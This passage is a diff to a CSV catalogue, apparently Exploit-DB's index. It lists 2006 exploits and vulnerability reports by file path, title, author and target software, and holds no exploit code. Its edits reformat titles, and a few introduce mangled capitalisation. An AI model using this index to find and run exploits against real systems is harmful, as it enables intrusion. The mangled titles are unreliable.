- Remote File Include Vulnerability",2006-05-12,Kacper,php,webapps,0 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 -1781,platforms/windows/dos/1781.txt,"outgun <= 1.0.3 bot 2 Multiple Vulnerabilities exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1781,platforms/windows/dos/1781.txt,"outgun <= 1.0.3 bot 2 - Multiple Vulnerabilities Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1782,platforms/windows/dos/1782.txt,"Empire <= 4.3.2 (strncat) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1783,platforms/windows/dos/1783.txt,"Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 -1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 Multiple Vulnerabilities exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 +1784,platforms/windows/dos/1784.txt,"raydium <= svn 309 - Multiple Vulnerabilities Exploit",2006-05-14,"Luigi Auriemma",windows,dos,0 1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source <= 4.2 (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0 1787,platforms/windows/remote/1787.py,"freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit",2006-05-15,"Tauqeer Ahmad",windows,remote,22 1788,platforms/windows/remote/1788.pm,"PuTTy.exe <= 0.53 - (validation) Remote Buffer Overflow Exploit (meta)",2006-05-15,y0,windows,remote,0 @@ -1511,7 +1511,7 @@ id,file,description,date,author,platform,type,port 1798,platforms/php/webapps/1798.txt,"Quezza BB <= 1.0 (quezza_root_path) File Inclusion Vulnerability",2006-05-17,nukedx,php,webapps,0 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners",2006-05-17,class101,multiple,remote,0 1800,platforms/php/webapps/1800.txt,"ScozNews <= 1.2.1 (mainpath) Remote File Inclusion Vulnerability",2006-05-17,Kacper,php,webapps,0 -1801,platforms/multiple/dos/1801.txt,"libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 +1801,platforms/multiple/dos/1801.txt,"libextractor <= 0.5.13 - Multiple Heap Overflow PoC Exploits",2006-05-17,"Luigi Auriemma",multiple,dos,0 1802,platforms/multiple/dos/1802.html,"Mozilla Firefox <= 1.5.0.3 (Loop) Denial of Service Exploit",2006-05-18,"Gianni Amato",multiple,dos,0 1804,platforms/php/webapps/1804.txt,"phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities",2006-05-19,[Oo],php,webapps,0 1805,platforms/php/webapps/1805.pl,"phpListPro <= 2.0.1 (Language) Remote Code Execution Exploit",2006-05-19,[Oo],php,webapps,0 @@ -1536,7 +1536,7 @@ id,file,description,date,author,platform,type,port 1825,platforms/php/webapps/1825.txt,"Back-End CMS <= 0.7.2.2 (BE_config.php) Remote Include Vulnerability",2006-05-25,Kacper,php,webapps,0 1826,platforms/php/webapps/1826.txt,"Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability",2006-05-25,Aesthetico,php,webapps,0 1827,platforms/php/webapps/1827.txt,"V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability",2006-05-25,beford,php,webapps,0 -1828,platforms/php/webapps/1828.txt,"DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability",2006-05-25,beford,php,webapps,0 +1828,platforms/php/webapps/1828.txt,"DoceboLms <= 2.0.5 (help.php) Remote File Include Vulnerability",2006-05-25,beford,php,webapps,0 1829,platforms/php/webapps/1829.txt,"APC ActionApps CMS 2.8.1 - Remote File Include Vulnerabilities",2006-05-25,Kacper,php,webapps,0 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff <= 3.8.2) Local Stack Buffer Overflow PoC",2006-05-26,nitr0us,linux,local,0 1832,platforms/php/webapps/1832.txt,"Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability",2006-05-26,beford,php,webapps,0 @@ -1544,13 +1544,13 @@ id,file,description,date,author,platform,type,port 1834,platforms/asp/webapps/1834.asp,"Easy-Content Forums 1.0 - Multiple SQL/XSS Vulnerabilities",2006-05-26,ajann,asp,webapps,0 1835,platforms/php/webapps/1835.txt,"Hot Open Tickets <= 11012004 (CLASS_PATH) Remote Include Vuln",2006-05-27,Kacper,php,webapps,0 1836,platforms/asp/webapps/1836.txt,"PrideForum 1.0 (forum.asp) Remote SQL Injection Vulnerability",2006-05-27,ajann,asp,webapps,0 -1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x (create an admin) Remote SQL Injection Exploit",2006-05-27,nukedx,asp,webapps,0 -1838,platforms/windows/dos/1838.html,"MS Internet Explorer (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 +1837,platforms/asp/webapps/1837.pl,"MiniNuke 2.x - (create an admin) Remote SQL Injection Exploit",2006-05-27,nukedx,asp,webapps,0 +1838,platforms/windows/dos/1838.html,"Microsoft Internet Explorer (HTML Tag) Memory Corruption (MS06-013)",2006-05-27,"Thomas Waldegger",windows,dos,0 1839,platforms/php/webapps/1839.txt,"tinyBB <= 0.3 - Remote (Include / SQL Injection) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 1840,platforms/asp/webapps/1840.txt,"Enigma Haber <= 4.3 - Multiple Remote SQL Injection Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities",2006-05-28,nukedx,php,webapps,0 -1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 Remote (SQL Injection / Privilege Escalation) Exploit",2006-05-28,nukedx,php,webapps,0 -1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x Multiple Remote File Inclusion Vulnerabilities",2006-05-28,nukedx,php,webapps,0 +1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 - Remote (SQL Injection / Privilege Escalation) Exploit",2006-05-28,nukedx,php,webapps,0 +1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion Vulnerabilities",2006-05-28,nukedx,php,webapps,0 1844,platforms/php/webapps/1844.txt,"Activity MOD Plus <= 1.1.0 (phpBB Mod) File Inclusion Vulnerability",2006-05-28,nukedx,php,webapps,0 1845,platforms/asp/webapps/1845.txt,"ASPSitem <= 2.0 - Remote (SQL Injection / DB Disclosure) Vulnerabilities",2006-05-28,nukedx,asp,webapps,0 1846,platforms/php/webapps/1846.txt,"Blend Portal <= 1.2.0 (phpBB Mod) Remote File Inclusion Vulnerability",2006-05-28,nukedx,php,webapps,0 @@ -1563,7 +1563,7 @@ id,file,description,date,author,platform,type,port 1853,platforms/php/webapps/1853.php,"pppBlog <= 0.3.8 (randompic.php) System Disclosure Exploit",2006-05-31,rgod,php,webapps,0 1854,platforms/php/webapps/1854.txt,"Ottoman CMS <= 1.1.3 (default_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 1855,platforms/php/webapps/1855.txt,"metajour 2.1 (system_path) Remote File Include Vulnerabilities",2006-05-31,Kacper,php,webapps,0 -1856,platforms/windows/dos/1856.url,"MS Internet Explorer (inetconn.dll) Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 +1856,platforms/windows/dos/1856.url,"Microsoft Internet Explorer (inetconn.dll) Stack Overflow Crash",2006-05-31,Mr.Niega,windows,dos,0 1857,platforms/php/webapps/1857.pl,"TinyPHP Forum <= 3.6 (profile.php) Remote Code Execution Exploit",2006-06-01,Hessam-x,php,webapps,0 1858,platforms/php/webapps/1858.txt,"AssoCIateD CMS 1.1.3 (root_path) Remote File Include Vulnerability",2006-06-01,Kacper,php,webapps,0 1859,platforms/asp/webapps/1859.htm,"aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit",2006-06-01,ajann,asp,webapps,0 @@ -1575,7 +1575,7 @@ id,file,description,date,author,platform,type,port 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 (common-menu.php) Remote File Include Vulnerabilities",2006-06-02,Kacper,php,webapps,0 1866,platforms/php/webapps/1866.txt,"PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 1867,platforms/multiple/dos/1867.html,"Mozilla Firefox <= 1.5.0.4 (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 -1868,platforms/php/webapps/1868.php,"Pixelpost <= 1-5rc1-2 Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 +1868,platforms/php/webapps/1868.php,"Pixelpost <= 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 1869,platforms/php/webapps/1869.php,"DotClear <= 1.2.4 (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework <= 4.6 - Remote File Include Vulnerabilities",2006-06-03,Kacper,php,webapps,0 1871,platforms/php/webapps/1871.txt,"WebspotBlogging <= 3.0.1 (path) Remote File Include Vulnerability",2006-06-03,Kacper,php,webapps,0 @@ -1609,7 +1609,7 @@ id,file,description,date,author,platform,type,port 1899,platforms/php/webapps/1899.txt,"free QBoard <= 1.1 (qb_path) Remote File Include Vulnerability",2006-06-11,Kacper,php,webapps,0 1900,platforms/asp/webapps/1900.txt,"MaxiSepet <= 1.0 (link) SQL Injection Vulnerability",2006-06-11,nukedx,asp,webapps,0 1901,platforms/php/webapps/1901.pl,"RCblog <= 1.03 (post) Remote Command Execution Exploit",2006-06-11,Hessam-x,php,webapps,0 -1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 (spaw_root) Remote File Include Vulnerability",2006-06-11,"Federico Fazzi",php,webapps,0 +1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - (spaw_root) Remote File Include Vulnerability",2006-06-11,"Federico Fazzi",php,webapps,0 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0 1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x (root) Remote File Include Vulnerability",2006-06-12,"Federico Fazzi",php,webapps,0 @@ -1633,7 +1633,7 @@ id,file,description,date,author,platform,type,port 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 (ipath) Remote File Include Vulnerability",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0 1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 -1926,platforms/php/webapps/1926.txt,"PHP Live Helper <= 1.x (abs_path) Remote File Include Vulnerability",2006-06-18,SnIpEr_SA,php,webapps,0 +1926,platforms/php/webapps/1926.txt,"PHP Live Helper <= 1.x - (abs_path) Remote File Include Vulnerability",2006-06-18,SnIpEr_SA,php,webapps,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel Unicode Local Overflow Exploit PoC",2006-06-18,kingcope,windows,dos,0 1928,platforms/php/webapps/1928.txt,"IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability",2006-06-19,Kacper,php,webapps,0 1929,platforms/php/webapps/1929.txt,"Micro CMS <= 0.3.5 (microcms_path) Remote File Include Vulnerability",2006-06-19,CeNGiZ-HaN,php,webapps,0 @@ -1662,7 +1662,7 @@ id,file,description,date,author,platform,type,port 1952,platforms/php/webapps/1952.txt,"THoRCMS <= 1.3.1 (phpbb_root_path) Remote File Include Vulnerability",2006-06-25,Kw3[R]Ln,php,webapps,0 1953,platforms/php/webapps/1953.pl,"DeluxeBB <= 1.07 (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 1954,platforms/php/webapps/1954.pl,"DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 -1955,platforms/php/webapps/1955.txt,"CBSMS Mambo Module <= 1.0 - Remote File Include Vulnerability",2006-06-26,Kw3[R]Ln,php,webapps,0 +1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module <= 1.0 - Remote File Include Vulnerability",2006-06-26,Kw3[R]Ln,php,webapps,0 1956,platforms/php/webapps/1956.txt,"Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities",2006-06-27,Kw3[R]Ln,php,webapps,0 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit <= 1.4.0 (forumid) Remote SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0 @@ -1675,7 +1675,7 @@ id,file,description,date,author,platform,type,port 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0 -1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 +1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 - Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 (dbinstall.php) Remote File Include Vulnerability",2006-07-01,"Hamid Ebadi",php,webapps,0 1971,platforms/php/webapps/1971.txt,"Randshop <= 1.1.1 (header.inc.php) Remote File Include Vulnerability",2006-07-01,OLiBekaS,php,webapps,0 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit",2006-07-01,y3dips,multiple,dos,0 @@ -1683,7 +1683,7 @@ id,file,description,date,author,platform,type,port 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 (root) Multiple Remote File Inclusion Vulnerabilities",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client CG_ServerCommand() Remote Overflow Exploit",2006-07-02,RunningBon,windows,dos,0 -1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client CS_ITEMS Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 +1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client CS_ITEms Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel Universal Hlink Local Buffer Overflow Exploit",2006-07-02,"SYS 49152",windows,local,0 1980,platforms/windows/dos/1980.pl,"ImgSvr <= 0.6.5 (long http post) Denial of Service Exploit",2006-07-04,n00b,windows,dos,0 1981,platforms/php/webapps/1981.txt,"galleria Mambo Module <= 1.0b Remote File Include Vulnerability",2006-07-04,sikunYuk,php,webapps,0 @@ -1694,13 +1694,13 @@ id,file,description,date,author,platform,type,port 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0 1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability",2006-07-06,"Soroush Dalili",asp,webapps,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0 -1989,platforms/windows/dos/1989.html,"MS Internet Explorer 6 Table.Frameset NULL Dereference Vulnerability",2006-07-07,"Aviv Raff",windows,dos,0 -1990,platforms/windows/dos/1990.html,"MS Internet Explorer 6 (Internet.HHCtrl) Heap Overflow Vulnerability",2006-07-07,"H D Moore",windows,dos,0 +1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 Table.Frameset NULL Dereference Vulnerability",2006-07-07,"Aviv Raff",windows,dos,0 +1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 (Internet.HHCtrl) Heap Overflow Vulnerability",2006-07-07,"H D Moore",windows,dos,0 1991,platforms/php/webapps/1991.php,"Pivot <= 1.30 RC2 Privileges Escalation/Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 1992,platforms/windows/local/1992.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit (french)",2006-07-07,"Jerome Athias",windows,local,0 1993,platforms/php/webapps/1993.php,"PAPOO <= 3_RC3 SQL Injection/Admin Credentials Disclosure Exploit",2006-07-07,rgod,php,webapps,0 1994,platforms/php/webapps/1994.txt,"SimpleBoard Mambo Component <= 1.1.0 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 -1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 +1995,platforms/php/webapps/1995.txt,"com_forum Mambo Component <= 1.2.4RC3 - Remote Include Vulnerability",2006-07-08,h4ntu,php,webapps,0 1996,platforms/php/webapps/1996.txt,"Sabdrimer PRO <= 2.2.4 (pluginpath) Remote File Include Vulnerability",2006-07-09,A.nosrati,php,webapps,0 1997,platforms/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit",2006-07-09,joffer,multiple,remote,10000 1998,platforms/php/webapps/1998.pl,"Ottoman CMS <= 1.1.3 (default_path) Remote File Inclusion Exploit",2006-07-09,"Jacek Wlodarczyk",php,webapps,0 @@ -1719,7 +1719,7 @@ id,file,description,date,author,platform,type,port 2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 -2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 +2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit (perl)",2006-07-15,UmZ,multiple,remote,10000 @@ -1734,7 +1734,7 @@ id,file,description,date,author,platform,type,port 2026,platforms/php/webapps/2026.txt,"com_hashcash Mambo Component <= 1.2.1 Include Vulnerability",2006-07-17,Matdhule,php,webapps,0 2027,platforms/php/webapps/2027.txt,"HTMLArea3 Mambo Module <= 1.5 - Remote Include Vulnerability",2006-07-17,Matdhule,php,webapps,0 2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component <= 2.0.0 - Remote Include Vulnerability",2006-07-17,Matdhule,php,webapps,0 -2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component <= 1.22.07 Remote Include Vulnerability",2006-07-17,vitux,php,webapps,0 +2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component <= 1.22.07 - Remote Include Vulnerability",2006-07-17,vitux,php,webapps,0 2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities",2006-07-17,Matdhule,php,webapps,0 2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - prctl() Local Root Exploit (logrotate)",2006-07-18,"Marco Ivaldi",linux,local,0 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0 @@ -1743,14 +1743,14 @@ id,file,description,date,author,platform,type,port 2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0 2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0 -2039,platforms/windows/dos/2039.pl,"MS Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 +2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0 2046,platforms/php/webapps/2046.txt,"iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit",2006-07-20,"Jacopo Cervini",windows,remote,0 2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 (JBoss) Remote Code Execution Exploit",2006-07-20,"Jon Hart",hardware,remote,0 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability",2006-07-20,Aesthetico,php,webapps,0 2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0 -2052,platforms/windows/remote/2052.sh,"MS Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0 +2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0 @@ -1758,8 +1758,8 @@ id,file,description,date,author,platform,type,port 2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0 2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability",2006-07-23,magnific,php,webapps,0 -2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability",2006-07-23,"ScanAlert Security",multiple,remote,0 -2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component <= 18RC1 Remote Include Vulnerability",2006-07-23,"Kurdish Security",php,webapps,0 +2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing Vulnerability",2006-07-23,"ScanAlert Security",multiple,remote,0 +2062,platforms/php/webapps/2062.txt,"MoSpray Mambo Component <= 18RC1 - Remote Include Vulnerability",2006-07-23,"Kurdish Security",php,webapps,0 2063,platforms/php/webapps/2063.txt,"ArticlesOne <= 07232006 (page) Remote Include Vulnerability",2006-07-23,CyberLord,php,webapps,0 2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha Remote Inclusion Vulnerability",2006-07-23,jank0,php,webapps,0 2065,platforms/windows/local/2065.c,"Cheese Tracker <= 0.9.9 - Local Buffer Overflow Exploit PoC",2006-07-23,"Luigi Auriemma",windows,local,0 @@ -1781,7 +1781,7 @@ id,file,description,date,author,platform,type,port 2081,platforms/php/webapps/2081.txt,"Portail PHP <= 1.7 (chemin) Remote Inclusion Vulnerability",2006-07-27,"Mehmet Ince",php,webapps,0 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox <= 1.5.0.4 - Javascript Navigator Object Code Execution PoC",2006-07-28,"H D Moore",multiple,remote,0 2083,platforms/php/webapps/2083.txt,"Mambo Security Images Component <= 3.0.5 Inclusion Vulnerabilities",2006-07-28,Drago84,php,webapps,0 -2084,platforms/php/webapps/2084.txt,"Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability",2006-07-28,"A-S-T TEAM",php,webapps,0 +2084,platforms/php/webapps/2084.txt,"Mambo MGM Component <= 0.95r2 - Remote Inclusion Vulnerability",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability",2006-07-29,Drago84,php,webapps,0 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component <= 3.1b Remote Inclusion Vulnerability",2006-07-29,Dr.Jr7,php,webapps,0 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,R00t[ATI],php,webapps,0 @@ -1789,8 +1789,8 @@ id,file,description,date,author,platform,type,port 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component <= 0.5 - Remote Include Vulnerability",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability",2006-07-30,Pablin77,php,webapps,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit (french)",2006-07-30,NSRocket,windows,local,0 -2092,platforms/php/webapps/2092.txt,"Joomla LMO Component <= 1.0b2 Remote Include Vulnerability",2006-07-30,vitux,php,webapps,0 -2094,platforms/windows/local/2094.c,"Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 Multiple BOF Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 +2092,platforms/php/webapps/2092.txt,"Joomla LMO Component <= 1.0b2 - Remote Include Vulnerability",2006-07-30,vitux,php,webapps,0 +2094,platforms/windows/local/2094.c,"Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 - Multiple BOF Exploit",2006-07-31,"Luigi Auriemma",windows,local,0 2095,platforms/php/webapps/2095.txt,"PhpReactor 1.2.7pl1 (pathtohomedir) Remote Inclusion Vulnerability",2006-07-31,CeNGiZ-HaN,php,webapps,0 2096,platforms/php/webapps/2096.txt,"MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability",2006-07-31,"Philipp Niedziela",php,webapps,0 2097,platforms/php/webapps/2097.txt,"NewsLetter <= 3.5 (NL_PATH) Remote File Inclusion Vulnerability",2006-08-01,SHiKaA,php,webapps,0 @@ -1830,7 +1830,7 @@ id,file,description,date,author,platform,type,port 2133,platforms/php/webapps/2133.txt,"Simple CMS Administrator Authentication Bypass Vulnerability",2006-08-07,daaan,php,webapps,0 2134,platforms/php/webapps/2134.txt,"phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability",2006-08-07,Solpot,php,webapps,0 2135,platforms/php/webapps/2135.txt,"NEWSolved Lite 1.9.2 - (abs_path) Remote File Inclusion Vulnerabilities",2006-08-07,"Philipp Niedziela",php,webapps,0 -2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall <= 3.3.03.053 Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 +2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Include Vulnerability",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - Remote SQL Injection Vulnerability",2006-08-07,ASIANEAGLE,asp,webapps,0 2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet <= 0.5 (Core.php) Remote File Include Vulnerability",2006-08-07,Minion,php,webapps,0 @@ -1839,7 +1839,7 @@ id,file,description,date,author,platform,type,port 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion Vulnerability",2006-08-07,"Mehmet Ince",php,webapps,0 2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 2144,platforms/linux/local/2144.sh,"liblesstif <= 